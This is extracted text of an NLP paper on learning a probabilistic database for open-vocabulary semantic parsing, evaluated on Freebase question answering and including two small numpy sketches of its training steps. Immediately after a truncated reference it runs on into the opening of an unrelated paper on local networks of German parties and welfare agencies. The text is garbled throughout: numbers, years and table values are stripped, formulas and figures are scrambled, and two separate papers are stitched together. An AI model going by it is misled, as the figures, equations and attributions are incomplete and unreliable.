for safe queries, j`kp (e) = p(e ∈ γ|s), that is, the proba- bilistic denotation computed according to the above rules is equal to the marginal probability distribu- tion. in practice, all of the queries in the experi- ments are safe, because they contain only one query variable and do not contain repeated predicates. for more information on query evaluation in probabilis- tic databases, we refer the reader to suciu et al. ( ). note that inference does not compute the most probable denotation, maxγ p(γ|s). in some sense, the most probable denotation is the correct output for a model-theoretic semantics. however, it is highly sensitive to the probabilities in the database, and in many cases it is empty (because a conjunction of independent boolean random variables is unlikely to be true). producing a ranked list of entities is also useful for evaluation purposes. training the training problem in our approach is to learn pa- rameters θ and φ for the probabilistic database. we consider two different objective functions for learn- ing these parameters that use slightly different forms of training data. in both cases, training has two phases. first, we generate training data, in the form of observed assertions or query-answer pairs, by ap- plying the rule-based semantic parser to a corpus of entity-linked web text. second, we optimize the parameters of the probabilistic database to rank ob- served assertions or answers above unobserved as- sertions or answers. this listing of rules is partial as it does not include, e.g., negation or joins between one-argument and two-argument log- ical forms. however, the corresponding rules are easy to derive. . training data training data is generated by applying the process illustrated in figure to each sentence in an entity- linked web corpus. first, we apply our rule-based semantic parser to the sentence to produce a logi- cal form. next, we extract portions of this logical form where every variable is bound to a particu- lar freebase entity, resulting in a simplified logical form. because the logical forms are existentially- quantified conjunctions of predicates, this step sim- ply discards any conjuncts in the logical form con- taining a variable that is not bound to a freebase entity. from this simplified logical form, we gen- erate two types of training data: ( ) predicate in- stances, and ( ) queries with known answers (see figure ). in both cases, the corpus consists entirely of assumed-to-be-true statements, making obtaining negative examples a major challenge for training. . predicate ranking objective riedel et al. ( ) introduced a ranking objective to work around the lack of negative examples in a sim- ilar matrix factorization problem. their objective is a modified version of bayesian personalized rank- ing (rendle et al., ) that aims to rank observed predicate instances above unobserved instances. this objective function uses observed predicate instances (figure , bottom left) as training data. this data consists of two collections, {(ci,ei)}ni= and {(rj, tj)}mj= , of observed category and relation instances. we use tj to denote a tuple of entities, tj = (ej, ,ej, ), to simplify notation. the predicate ranking objective is: op (θ,φ) = n∑ i= log σ(θtci(φei −φe′i)) + m∑ j= log σ(θtrj (φtj −φt′j )) where e′i is a randomly sampled entity such that (ci,e ′ i) does not occur in the training data. simi- larly, t′j is a random entity tuple such that (rj, t ′ j) does not occur. 
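a minimal sketch of this objective for a single category instance is given below: for an observed instance (c, e) and a sampled unobserved entity e', one gradient-ascent step increases log σ(θc · (φe − φe')); relation instances would be handled identically over entity-pair vectors. the learning rate, dimensionality and entity names are placeholders, not the settings used in the paper.

```python
import numpy as np

# sketch of one stochastic step on the predicate ranking objective for a single
# category: maximize log sigma(theta_c . (phi_obs - phi_neg)). the sizes,
# learning rate and entity names are illustrative placeholders.

rng = np.random.default_rng(1)
k, lr = 4, 0.1
theta_c = rng.normal(scale=0.1, size=k)                      # one category's parameters
phi = {e: rng.normal(scale=0.1, size=k) for e in ["e_obs", "e_neg"]}

def sigma(x):
    return 1.0 / (1.0 + np.exp(-x))

def ranking_step(c_vec, e_obs, e_neg):
    """gradient ascent on log sigma(theta_c . (phi[e_obs] - phi[e_neg]))."""
    diff = phi[e_obs] - phi[e_neg]
    g = 1.0 - sigma(c_vec @ diff)          # derivative of log sigma at the current score
    grad_c, grad_e = g * diff, g * c_vec
    c_vec += lr * grad_c                   # observed entity is pushed up, sampled one down
    phi[e_obs] += lr * grad_e
    phi[e_neg] -= lr * grad_e
    return float(np.log(sigma(c_vec @ (phi[e_obs] - phi[e_neg]))))

for _ in range(5):
    print(ranking_step(theta_c, "e_obs", "e_neg"))   # the printed objective slowly increases
```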
maximizing this function attempts a seemingly simple solution to this problem is to randomly generate negative examples; however, we empirically found that this approach performs considerably worse than both of the pro- posed ranking objectives. original sentence and logical form general powell, appearing sunday on cnn ’s late edition, said ... ∃w,x,y,z. w = /en/powell ∧ general(w) ∧ appearing(w,x) ∧ sunday(x) ∧ appearing on(w,y) ∧y = /en/late ∧ ’s(z,y)∧z = /en/cnn ∧ said(w,...) simplified logical form ∃w,y,z. w = /en/powell ∧ general(w)∧ appearing on(w,y)∧y = /en/late ∧ ’s(z,y)∧z = /en/cnn instances queries answers general(/en/powell) λw.general(w)∧ appearing on(w, /en/late) /en/powell appearing on(/en/powell, /en/late) λy.appearing on(/en/powell,y)∧ ’s(/en/cnn,y) /en/late ’s(/en/cnn, /en/late) λz.’s(z, /en/late) /en/cnn figure : illustration of training data generation applied to a single sentence. we generate two types of train- ing data, predicate instances and queries with observed answers, by semantically parsing the sentence and extracting portions of the generated logical form with observed entity arguments. the predicate instances are extracted from the conjuncts in the simplified logical form, and the queries are created by removing a single entity from the simplified logical form. to find θci , φei and φe′i such that p(ci(ei)) is larger than p(ci(e′i)) (and similarly for relations). during training, e′i and t ′ j are resampled on each pass over the data set according to each entity or tuple’s em- pirical frequency. . query ranking objective the previous objective aims to rank the entities within each predicate well. however, such within- predicate rankings are insufficient to produce correct answers for queries containing multiple predicates – the scores for each predicate must further be cali- brated to work well with each other given the inde- pendence assumptions of the probabilistic database. we introduce a new training objective that encour- ages good rankings for entire queries instead of sin- gle predicates. the data for this objective consists of tuples, {(`i,ei)}ni= , of a query `i with an ob- served answer ei (figure , bottom right). each `i is a function with exactly one entity argument, and `i(e) is a conjunction of predicate instances. for ex- ample, the last query in figure is a function of one argument z, and `(e) is a single predicate instance, ’s(e, /en/late). the new objective aims to rank the observed entity answer above unobserved enti- ties for each query: oq(θ,φ) = n∑ i= log prank(`i,ei,e ′ i) prank generalizes the approximate ranking prob- ability defined by the predicate ranking objec- tive to more general queries. the expression σ(θtc (φe − φe′)) in the predicate ranking objective can be viewed as an approximation of the prob- ability that e is ranked above e′ in category c. prank uses this approximation for each individual predicate in the query. for example, given the query ` = λx.c(x) ∧ r(x,y) and entities (e,e′), prank(`,e,e ′) = σ(θc(φe − φe′)) × σ(θr(φ(e,y) − φ(e′,y))). for this objective, we sample e ′ i such that (`i,e ′ i) does not occur in the training data. when `’s body consists of a conjunction of pred- icates, the query ranking objective simplifies con- siderably. in this case, ` can be described as three sets of one-argument functions: categories c(`) = {λx.c(x)}, left arguments of relations rl(`) = {λx.r(x,y)}, and right arguments of re- lations rr(`) = {λx.r(y,x)}. 
furthermore, prank is a product so we can distribute the log: oq(θ,φ) = n∑ i= ∑ λx.c(x)∈c(`i) log σ(θc(φei −φe′i)) + ∑ λx.r(x,y)∈rl(`i) log σ(θr(φ(ei,y) −φ(e′i,y))) + ∑ λx.r(y,x)∈rr(`i) log σ(θr(φ(y,ei) −φ(y,e′i))) this simplification reveals that the main differ- ence between oq and op is the sampling of the unobserved entities e′ and tuples t′. op samples them in an unconstrained fashion from their empir- ical distributions for every predicate. oq considers the larger context in which each predicate occurs, with two major effects. first, more negative exam- ples are generated for categories because the logical forms ` are more specific. for example, both “pres- ident of sprint” and “president of the us” generate instances of the president predicate; oq will use entities that only occur with one of these as negative examples for the other. second, the relation param- eters are trained to rank tuples with a shared argu- ment, as opposed to tuples in general. note that, although prank generalizes to more complex logical forms than existentially-quantified conjunctions, training with these logical forms is more difficult because prank is no longer a product. in these cases, it becomes necessary to perform in- ference within the gradient computation, which can be expensive. the restriction to conjunctions makes inference trivial, enabling the factorization above. evaluation we evaluate our approach to compositional seman- tics on a question answering task. each test exam- ple is a (compositional) natural language question whose answer is a set of freebase entities. we com- pare our open domain approach to several baselines based on prior work, as well as a human-annotated freebase query for each example. . data we used clueweb web corpus with the corre- sponding google facc entity linking (gabrilovich et al., ) to create the training and test data for our experiments. the training data is derived from million webpages, and contains . m predicate in- stances, . m queries, k entities and k entity pairs. predicates that appeared fewer than times in the training data were replaced with the predicate unk, resulting in k categories and . k relations. our test data consists of fill-in-the-blank natu- ral language questions such as “incan emperor ” or “cunningham directed auchtre’s second music video .” these questions were created by apply- ing the training data generation process (section . ) to a collection of held-out webpages. each natural language question has a corresponding logical form http://www.lemurproject.org/clueweb . php # of questions avg. # of predicates / query . avg. # of categories / query . avg. # of relations / query . avg. # of answers / query . # of questions with ≥ answer (found by at least one system) table : statistics of the test data set. query containing at least one category and relation. we chose not to use existing data sets for seman- tic parsing into freebase as our goal is to model the semantics of language that cannot necessarily be modelled using the freebase schema. existing data sets, such as free (cai and yates, ) and we- bquestions (berant et al., ), would not allow us to evaluate performance on this subset of language. consequently, we evaluate our system on a new data set with unconstrained language. however, we do compare our approach against manually-annotated freebase queries on our new data set (section . ). all of the data for our experiments is available at http://rtw.ml.cmu.edu/tacl _csf. . 
methodology our evaluation methodology is inspired by infor- mation retrieval evaluations (manning et al., ). each system predicts a ranked list of answers for each test question. we then pool the top an- swers of each system and manually judge their cor- rectness. the correct answers from the pool are then used to evaluate the precision and recall of each sys- tem. in particular, we compute average precision (ap) for each question and report the mean average precision (map) across all questions. we also re- port a weighted version of map, where each ques- tion’s ap is weighted by its number of annotated correct answers. average precision is computed as m ∑m k= prec(k) × correct(k), where prec(k) is the precision at rank k, correct(k) is an indicator function for whether the kth answer is correct, and m is the number of returned answers (at most ). statistics of the annotated test set are shown in table . a consequence of our unconstrained data generation approach is that some test questions are difficult to answer: of the queries, at least one system was able to produce a correct answer for . the remaining questions are mostly unanswerable map weighted map clustering . . corpuslookup . . factorization (op ) . . factorization (oq) . . ensemble (op ) . . ensemble (oq) . . upper bound . . table : mean average precision for our question answering task. the difference in map between each pair of adjacent models is statistically signifi- cant (p < . ) via the sign test. because they reference rare entities unseen in the training data. . models and baselines we implemented two baseline models based on ex- isting techniques. the corpuslookup baseline answers test questions by directly using the predi- cate instances in the training data as its knowledge base. for example, given the query λx.ceo(x) ∧ of(x, /en/sprint), this model will return the set of entities e such that ceo(e) and of(e, /en/sprint) both appear in the training data. all answers found in this fashion are assigned probability . the clustering baseline first clusters the pred- icates in the training corpus, then answers ques- tions using the clustered predicates. the clustering aggregates predicates with similar denotations, ide- ally identifying synonyms to smooth over sparsity in the training data. our approach is closely based on lewis and steedman ( ), though is also con- ceptually related to approaches such as dirt (lin and pantel, ) and usp (poon and domingos, ). we use the chinese whispers clustering al- gorithm (biemann, ) and calculate the similar- ity between predicates as the cosine similarity of their tf-idf weighted entity count vectors. the de- notation of each cluster is the union of the denota- tions of the clustered predicates, and each entity in the denotation is assigned probability . we also trained two probabilistic database mod- els, factorization (op ) and factorization (oq), using the two objective functions described in sections . and . , respectively. we optimized both objectives by performing passes over the recall p re ci si on ens. (oq) ens. (op ) fact. (oq) fact. (op ) c.lookup clustering . . . . . . . . . . . . . b b b b b b b b b b b + + + + + + + + + + + r r r r r r r r r r r u u u u u u u u u u u b b b b b b b b b b b + + + + + + + + + + + figure : averaged -point precision/recall curves for the answerable test questions. training data with adagrad (duchi et al., ) us- ing an l regularization parameter of λ = − . the predicate and entity embeddings have di- mensions. 
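for completeness, the sketch below shows the shape of an adagrad ascent step with l2 regularization of the kind just described; the gradient, learning rate and regularization strength are stand-ins rather than the values reported above.

```python
import numpy as np

# minimal sketch of an adagrad ascent step with l2 regularization, as used to
# optimize the ranking objectives. the gradient, learning rate and l2 strength
# below are placeholders, not the paper's settings.

def adagrad_step(param, grad, cache, lr=0.5, l2=1e-4, eps=1e-8):
    """ascent step: regularized gradient, scaled by the accumulated squared gradients."""
    grad = grad - l2 * param                 # gradient of (objective - l2/2 * ||param||^2)
    cache += grad ** 2                       # per-coordinate sum of squared gradients
    param += lr * grad / (np.sqrt(cache) + eps)
    return param, cache

theta = np.zeros(4)
cache = np.zeros(4)
for _ in range(3):
    stand_in_gradient = np.ones(4)           # would be the ranking-objective gradient
    theta, cache = adagrad_step(theta, stand_in_gradient, cache)
print(theta)
```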
these parameters were selected on the basis of preliminary experiments with a small vali- dation set. finally, we observed that corpuslookup has high precision but low recall, while both matrix fac- torization models have high recall with somewhat lower precision. this observation suggested that an ensemble of corpuslookup and factoriza- tion could outperform either model individually. we created two ensembles, ensemble (op ) and ensemble (oq), by calculating the probability of each predicate as a / mixture of each model’s predicted probability. . results table shows the results of our map evaluation, and figure shows a precision/recall curve for each model. the map numbers are somewhat low be- cause almost half of the test questions have no cor- rect answers and all models get an average preci- sion of on these questions. the upper bound on map is the fraction of questions with at least correct answer. note that the models perform well on the answerable questions, as reflected by the ra- tio of the achieved map to the upper bound. the weighted map metric also corrects for these unan- swerable questions, as they are assigned weight in the weighted average. these results demonstrate several findings. first, we find that both factorization models outper- form the baselines in both map and weighted map. # of questions w/ an annotated mql query query returns > answer query returns no answers # of questions w/o an mql query table : statistics of the freebase mql queries an- notated for the test data set. the performance improvement seems to be most significant in the high recall regime (right side of figure ). second, we find that the query ranking objective oq improves performance over the predi- cate ranking objective op by - % on the answer- able queries. the precision/recall curves show that this improvement is concentrated in the low recall regime. finally, the ensemble models are consider- ably better than their component models; however, even in the ensembled models, we find that oq out- performs op by a few percent. . comparison to semantic parsing to freebase a natural question is whether our open vocabu- lary approach outperforms a closed approach for the same problem, such as semantic parsing to freebase (e.g., reddy et al. ( )). in order to answer this question, we compared our best performing model to a manually-annotated freebase query for each test question. this comparison allows us to understand the relative advantages of open and closed predicate vocabularies. the first author manually annotated a freebase mql query for each natural language question in the test data set. this annotation is somewhat sub- jective, as many of the questions can only be inex- actly mapped on to the freebase schema. we used the following guidelines in performing the map- ping: ( ) all relations in the text must be mapped to one or more freebase relations, ( ) all enti- ties mentioned in the text must be included in the query, ( ) adjective modifiers can be ignored and ( ) entities not mentioned in the text may be in- cluded in the query. the fourth condition is nec- essary because many one-place predicates, such as mayor(x), are represented in freebase using a binary relation to a particular entity, such as government office/title(x, /en/mayor). statistics of the annotated queries are shown in map ensemble (oq) . freebase . table : mean average precision of our best per- forming model compared to a manually annotated freebase query for each test question. table . 
coverage is reasonably high: we were able to annotate a freebase query for questions ( % of the test set). the remaining unannotatable ques- tions are due to missing predicates in freebase, such as a relation defining the emperor of the incan em- pire. of the annotated freebase queries, of them return at least one entity answer. the queries with no answers typically reference uncommon en- tities which have few or no known relation instances in freebase. the annotated queries contain an aver- age of . freebase predicates. we compared our best performing model, en- semble (oq), to the manually annotated freebase queries using the same pooled evaluation methodol- ogy. the set of correct answers contains the correct predictions of ensemble (oq) from the previous evaluation along with all answers from freebase. results from this evaluation are shown in table . in terms of overall map, freebase outperforms our approach by a fair margin. however, this ini- tial impression belies a more complex reality, which is shown in table . this table compares both ap- proaches by their relative performance on each test question. on approximately one-third of the ques- tions, freebase has a higher ap than our approach. on another third, our approach has a higher ap than freebase. on the final third, both approaches per- form equally well – these are typically questions where neither approach returns any correct answers ( of the ). freebase outperforms in the over- all map evaluation because it tends to return more correct answers to each question. note that the annotated freebase queries have several advantages in this evaluation. first, freebase contains significantly more predicate instances than our training data, which allows it to produce more complete answers. second, the freebase queries the numbers in this table are not comparable to the num- bers in table as the correct answers for each question are dif- ferent. # of queries freebase higher ap ( %) equal ap ( %) ensemble (oq) higher ap ( %) table : question-by-question comparison of model performance. each test question is placed into one of the three buckets above, depending on whether freebase or ensemble (oq) achieves a better av- erage precision (ap) for the question. correspond to the performance of a perfect semantic parser, while current semantic parsers achieve accu- racies around % (berant and liang, ). the results from this experiment suggest that closed and open predicate vocabularies are comple- mentary. freebase produces high quality answers when it covers a question. however, many of the re- maining questions can be answered correctly using an open vocabulary approach like ours. this evalu- ation also suggests that recall is a limiting factor of our approach; in the future, recall can be improved by using a larger corpus or including freebase in- stances during training. related work open predicate vocabularies there has been considerable work on generating semantic representations with an open predicate vo- cabulary. much of the work is non-compositional, focusing on identifying similar predicates and enti- ties. dirt (lin and pantel, ), resolver (yates and etzioni, ) and other systems (yao et al., ) cluster synonymous expressions in a corpus of relation triples. matrix factorization is an alter- native approach to clustering that has been used for relation extraction (riedel et al., ; yao et al., ) and finding analogies (turney, ; speer et al., ). 
all of this work is closely related to dis- tributional semantics, which uses distributional in- formation to identify semantically similar words and phrases (turney and pantel, ; griffiths et al., ). some work has considered the problem of com- positional semantics with an open predicate vocab- ulary. unsupervised semantic parsing (poon and domingos, ; titov and klementiev, ) is a clustering-based approach that incorporates com- position using a generative model for each sentence that factors according to its parse tree. lewis and steedman ( ) also present a clustering-based ap- proach that uses ccg to perform semantic compo- sition. this approach is similar to ours, except that we use matrix factorization and freebase entities. finally, some work has focused on the problem of textual inference within this paradigm. fader et al. ( ) present a question answering system that learns to paraphrase a question so that it can be an- swered using a corpus of open ie triples (fader et al., ). distributional similarity has also been used to learn weighted logical inference rules that can be used for recognizing textual entailment or identifying semantically similar text (garrette et al., ; garrette et al., ; beltagy et al., ). this line of work focuses on performing inference between texts, whereas our work computes a text’s denotation. a significant difference between our work and most of the related work above is that our work computes denotations containing freebase entities. using these entities has two advantages: ( ) it en- ables us to use entity linking to disambiguate textual mentions, and ( ) it facilitates a comparison against alternative approaches that rely on a closed predi- cate vocabulary. disambiguating textual mentions is a major challenge for previous approaches, so an entity-linked corpus is a much cleaner source of data. however, our approach could also work with automatically constructed entities, for example, cre- ated by clustering mentions in an unsupervised fash- ion (singh et al., ). semantic parsing several semantic parsers have been developed for freebase (cai and yates, ; kwiatkowski et al., ; berant et al., ; berant and liang, ). our approach is most similar to that of reddy et al. ( ), which uses fixed syntactic parses of unla- beled text to train a freebase semantic parser. like our approach, this system automatically-generates query/answer pairs for training. however, this sys- tem, like all freebase semantic parsers, uses a closed predicate vocabulary consisting of only freebase predicates. in contrast, our approach uses an open predicate vocabulary and can learn denotations for words whose semantics cannot be represented using freebase predicates. consequently, our approach can answer many questions that these freebase se- mantic parsers cannot (see section . ). the rule-based semantic parser used in this pa- per is very similar to several other rule-based sys- tems that produce logical forms from syntactic ccg parses (bos, ; lewis and steedman, ). we developed our own system in order to have control over the particulars of the analysis; however, our ap- proach is compatible with these systems as well. probabilistic databases our system assigns a model-theoretic semantics to statements in natural language (dowty et al., ) using a learned distribution over possible worlds. 
this distribution is concisely represented in a probabilistic database, which can be viewed as a simple markov logic network (richardson and domingos, ) where all of the random vari- ables are independent. this independence simplifies query evaluation: probabilistic databases permit ef- ficient exact inference for safe queries (suciu et al., ), and approximate inference for the remain- der (gatterbauer et al., ; gatterbauer and suciu, ). discussion this paper presents an approach for compositional semantics with an open predicate vocabulary. our approach defines a probabilistic model over deno- tations (sets of freebase entities) conditioned on an input text. the model has two components: a rule- based semantic parser that produces a logical form for the text, and a probabilistic database that defines a distribution over denotations for each predicate. a training phase learns the probabilistic database by applying probabilistic matrix factorization with a query/answer ranking objective to logical forms de- rived from a large, entity-linked web corpus. an ex- perimental analysis demonstrates that this approach outperforms several baselines and can answer many questions that cannot be answered by semantic pars- ing into freebase. our approach learns a model-theoretic semantics for natural language text tied to freebase, as do some semantic parsers, except with an open predi- cate vocabulary. this difference influences several other aspects of the system’s design. first, because no knowledge base with the necessary knowledge exists, the system is forced to learn its knowledge base (in the form of a probabilistic database). sec- ond, the system can directly map syntactic ccg parses to logical forms, as it is no longer neces- sary to map words to a closed vocabulary of knowl- edge base predicates. in some sense, our approach is the exact opposite of the typical semantic pars- ing approach: usually, the semantic parser is learned and the knowledge base is fixed; here, the knowl- edge base is learned and the semantic parser is fixed. from a machine learning perspective, train- ing a probabilistic database via matrix factorization is easier than training a semantic parser, as there are no difficult inference problems. however, it remains to be seen whether a learned knowledge base can achieve similar recall as a fixed knowledge base on the subset of language it covers. there are two limitations of this work. the most obvious limitation is the restriction to existentially quantified conjunctions of predicates. this limita- tion is not inherent to the approach, however, and can be removed in future work by using a system like boxer (bos, ) for semantic parsing. a more serious limitation is the restriction to one- and two-argument predicates, which prevents our system from representing events and n-ary relations. con- ceptually, a similar matrix factorization approach could be used to learn embeddings for n-ary entity tuples; however, in practice, the sparsity of these tu- ples makes learning challenging. developing meth- ods for learning n-ary relations is an important prob- lem for future work. a direction for future work is scaling up the size of the training corpus to improve recall. low re- call is the main limitation of our current system as demonstrated by the experimental analysis. both stages of training, the data generation and matrix factorization, can be parallelized using a cluster. all of the relation instances in freebase can also be added to the training corpus. 
it should be feasible to increase the quantity of training data by a factor of - , for example, to train on all of clueweb. scaling up the training data may allow a semantic parser with an open predicate vocabulary to outper- form comparable closed vocabulary systems. acknowledgments this research was supported in part by darpa un- der contract number fa - - - , and by a generous grant from google. we additionally thank matt gardner, ndapa nakashole, amos azaria and the anonymous reviewers for their helpful com- ments. references michele banko, michael j. cafarella, stephen soderland, matt broadhead, and oren etzioni. . open infor- mation extraction from the web. in proceedings of the th international joint conference on artifical intel- ligence. islam beltagy, cuong chau, gemma boleda, dan gar- rette, katrin erk, and raymond mooney. . mon- tague meets markov: deep semantics with probabilis- tic logical form. in second joint conference on lexi- cal and computational semantics (*sem), volume : proceedings of the main conference and the shared task: semantic textual similarity. jonathan berant and percy liang. . semantic pars- ing via paraphrasing. in proceedings of the nd an- nual meeting of the association for computational linguistics. jonathan berant, andrew chou, roy frostig, and percy liang. . semantic parsing on freebase from question-answer pairs. in proceedings of the conference on empirical methods in natural lan- guage processing. chris biemann. . chinese whispers: an efficient graph clustering algorithm and its application to natu- ral language processing problems. in proceedings of the first workshop on graph based methods for nat- ural language processing. johan bos. . wide-coverage semantic analysis with boxer. in proceedings of the conference on se- mantics in text processing. qingqing cai and alexander yates. . large-scale semantic parsing via schema matching and lexicon extension. in proceedings of the annual meeting of the association for computational linguistics (acl). nilesh dalvi and dan suciu. . efficient query eval- uation on probabilistic databases. the vldb journal, ( ), october. david r. dowty, robert e. wall, and stanley peters. . introduction to montague semantics. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, : – , july. anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information ex- traction. in proceedings of the conference on empiri- cal methods in natural language processing. anthony fader, luke zettlemoyer, and oren etzioni. . paraphrase-driven learning for open question answering. in proceedings of the st annual meeting of the association for computational linguistics. evgeniy gabrilovich, michael ringgaard, and amar- nag subramanya. . facc : freebase anno- tation of clueweb corpora, version (release date - - , format version , correction level ). http://lemurproject.org/clueweb /. dan garrette, katrin erk, and raymond mooney. . integrating logical representations with probabilistic information using markov logic. in proceedings of the international conference on computational seman- tics. dan garrette, katrin erk, and raymond j. mooney. . a formal approach to linking logical form and vector-space lexical semantics. in harry bunt, johan bos, and stephen pulman, editors, computing mean- ing, volume , pages – . wolfgang gatterbauer and dan suciu. . approx- imate lifted inference with probabilistic databases. 
proceedings of the vldb endowment, ( ), january. wolfgang gatterbauer, abhay kumar jha, and dan su- ciu. . dissociation and propagation for efficient query evaluation over probabilistic databases. in pro- ceedings of the fourth international vldb workshop on management of uncertain data (mud ) in conjunction with vldb , singapore, september , . thomas l. griffiths, joshua b. tenenbaum, and mark steyvers. . topics in semantic representation. psychological review . julia hockenmaier and mark steedman. . acquir- ing compact lexicalized grammars from a cleaner tree- bank. in proceedings of third international confer- ence on language resources and evaluation. jayant krishnamurthy and tom m. mitchell. . weakly supervised training of semantic parsers. in proceedings of the joint conference on empir- ical methods in natural language processing and computational natural language learning. jayant krishnamurthy and tom m. mitchell. . joint syntactic and semantic parsing with combinatory cat- egorial grammar. in proceedings of the nd annual meeting of the association for computational linguis- tics. tom kwiatkowski, eunsol choi, yoav artzi, and luke zettlemoyer. . scaling semantic parsers with on-the-fly ontology matching. in proceedings of the conference on empirical methods in natural language processing. mike lewis and mark steedman. . combined distributional and logical semantics. transactions of the association for computational linguistics, : – . dekang lin and patrick pantel. . dirt — discov- ery of inference rules from text. in proceedings of the seventh acm sigkdd international conference on knowledge discovery and data mining. christopher d. manning, prabhakar raghavan, and hin- rich schütze. . introduction to information re- trieval. cambridge university press, new york, ny, usa. david milne and ian h. witten. . learning to link with wikipedia. in proceedings of the th acm con- ference on information and knowledge management. hoifung poon and pedro domingos. . unsuper- vised semantic parsing. in proceedings of the conference on empirical methods in natural lan- guage processing. lev ratinov, dan roth, doug downey, and mike an- derson. . local and global algorithms for dis- ambiguation to wikipedia. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies. siva reddy, mirella lapata, and mark steedman. . large-scale semantic parsing without question-answer pairs. transactions of the association of computa- tional linguistics – volume , issue . steffen rendle, christoph freudenthaler, zeno gantner, and lars schmidt-thieme. . bpr: bayesian per- sonalized ranking from implicit feedback. in proceed- ings of the twenty-fifth conference on uncertainty in artificial intelligence. matthew richardson and pedro domingos. . markov logic networks. machine learning, ( - ): – , february. sebastian riedel, limin yao, andrew mccallum, and benjamin m. marlin. . relation extraction with matrix factorization and universal schemas. in joint human language technology conference/annual meeting of the north american chapter of the asso- ciation for computational linguistics. sameer singh, amarnag subramanya, fernando pereira, and andrew mccallum. . large-scale cross- document coreference using distributed inference and hierarchical models. in association for computa- tional linguistics: human language technologies (acl hlt). robert speer, catherine havasi, and henry lieberman. . analogyspace: reducing the dimensionality of common sense knowledge. 
a visual data collection method: german local parties and associations

dr. isabelle borucki (corresponding author), university of trier, trier, germany

abstract

this research captures local networks of german political parties and welfare agencies in regards to poverty. the article explores whether there are differences in regards to homophily and brokerage between the two studied groups, using a dataset of egonetworks in two german cities. the computer-assisted drawn networks were collected in an interactive, participative way together with the interviewed egonetworks. to achieve the theoretical aim of analysing homophily and brokerage between politicians and welfare workers, two hypotheses are examined, resting upon social capital theory. the hypotheses were quantified and explicated with different variables. the first hypothesis states that heterophile networks imply more social capital, which referred to different measurements (size, density, homophily). this could be partially validated since the analysed networks of association representatives (n= ) were denser and slightly more heterophile than those of party representatives (n= ). second, it was assumed that politicians, because of their function as elected representatives, would be more likely to take on an interface function within the communities than representatives of civil society institutions.
results based on calculated ei-indices, subgraphs and brokerage show that party representatives do indeed have larger networks, but these networks split into fewer subgraphs than association representatives’ networks. author isabelle borucki currently is leading “dipart. digital party research” – a junior research group on digital party research, located at the nrw school of governance, university of duisburg-essen. before that she worked at the department of political science, university of trier. isabelle does research in political organizations and parties, comparative politics, and information technology/digitalization and politics. acknowledgements this research was funded by the german research foundation (dfg) within the project “po- litical representation of poverty by political parties in germany” of the collaborative re- search centre (crc) at trier university, germany. the author wishes to thank dimitris christopoulos for his recommendations and markus gamper, linda reschke and peter starke for their remarks on earlier versions of the paper. connections a visual data collection method | volume | issues & | insna.org . introduction poverty and social exclusion are pressing social issues in advanced and industrial- ized countries, such as germany. in ger- many, these issues are becoming more vis- ible through a public discussion of the german social security reform program ‘hartz iv’ or the poverty of children. for german local communities, the fields of poverty prevention and fighting against al- ready existing poverty structures pose a va- riety of challenges. officially, local institu- tions are responsible for a majority of so- cial benefits and their distribution. the in- terplay between different political actors and actors from civil society requires net- working, cooperation and coming to agreements at various levels. it is exactly this process, and the accompanying rela- tions and connections, which make munic- ipal efforts to fight poverty in germany an interesting field for political science; a field which has hardly been explored in terms of networking structures. this is surprising, because municipalities are es- pecially restricted in their actions and ca- pabilities and depend on the cooperation and involvement from the civil sector, which is a challenge specifically visible in the area of fighting poverty. the thematic aim of this paper is to capture the local network of political par- ties and welfare agencies regarding pov- erty, and to explore whether there are dif- ferences concerning homophily and bro- kerage between politicians and welfare workers. the research question is: how exactly are local political actors connected with organisations from civil society? the methodological goal is to show that social network analysis is well suited to statistically represent the relations be- tween local politicians and welfare agen- cies. additionally, the findings demon- strate that visual data collection allows for a simultaneous validation of data through the participation of the subject group. as a result, it can be illustrated how a visual in- quiry through digital networking maps en- ables a collection of quantitative data that can then be evaluated (gamper et al., ). lastly, it will be assessed how use- ful the method of visually surveying quan- titative data can be for the research field of local politics. 
here, the question is: which advantages and disadvantages emerged for participants during the survey because of structured and standardized digital network maps? . state of research and theoretical framework some studies exist that take a closer look at the state of the german local level and its existing structures of decision-making. however, social network analysis has not been significantly featured in these works (heinze & voelzkow, ; helbling, egli, & matter, ; fowler, ; ohm, ; werner, ). instead, the intent of this research is to offer a comparative look at the structures of fighting poverty at a lo- cal level by analysing the networks be- tween local politicians, welfare agencies and domestic associations. one exception to achieve this is the work of sören peter- mann ( ). he has studied the political influence of local politicians in the context of a social capital model in major cities, medium-sized cities and counties (peter- mann, , p. ). he wanted to show how the social capital (burt, ; cole- man, ) of established politicians in the municipality (mayor, county commission- er, parliamentary party leaders) affects their political influence within the local power structures. here, he measured the centrality of the actors and their broker po- sition in egonetworks (petermann, , p. , ). moreover, he calculated regres- sion models to estimate the social capital of politicians within interaction networks and found out that finding consensus and bargaining in networks depend on politi- cians’ prestige in the cities (ibid., p. ). in methodological concerns, he showed that local top politicians are highly con- nected within their community, but admits that his studied networks focused on strong ties and interactions within cities. howev- a visual data collection method connections insna.org | issues & | volume | er, no studies exist that explicitly focus on the field of poverty at the local level in germany. the study introduced here is meant to, at least partially, fill this academ- ic void. this study draws from bourdieu’s social capital theory (bourdieu, ; coleman ; lin, cook, & burt, ), because social capital enables inclusion in social networks, and entering social rela- tionships based on access to material and immaterial resources and support from other people (crossley et al. , p. – ). at this point, it is assumed that social capital can be an individual, as well as a collective good. in institutionalized rela- tionships, resources can be tapped, which can prove beneficial for the individual, as well as for the collective. here, it is helpful to understand networks as fields, in which social capital is distributed and exchanged (bourdieu, ). because one group dis- tinguishes itself from its outside, the pre- sent article is based on the assumption that, according to reciprocal recognition and re- inforcement, similar and homogenous ac- tors are to be found in local networks (bourdieu, ). consequently, the study is based on the following premises: the in- terrelationship between local party activ- ists, city administration and welfare agency officials serves as the exchange and foster- ing of one’s social capital. depending on how much social capital an ego can accu- mulate, meaning how many potential communicative relations it has, it is more likely to be able to articulate its interests and act inclusively at the political level. another, more special, type of capital is in- formation, because it is passed on through weak ties (granovetter, ) within, and between, networks. 
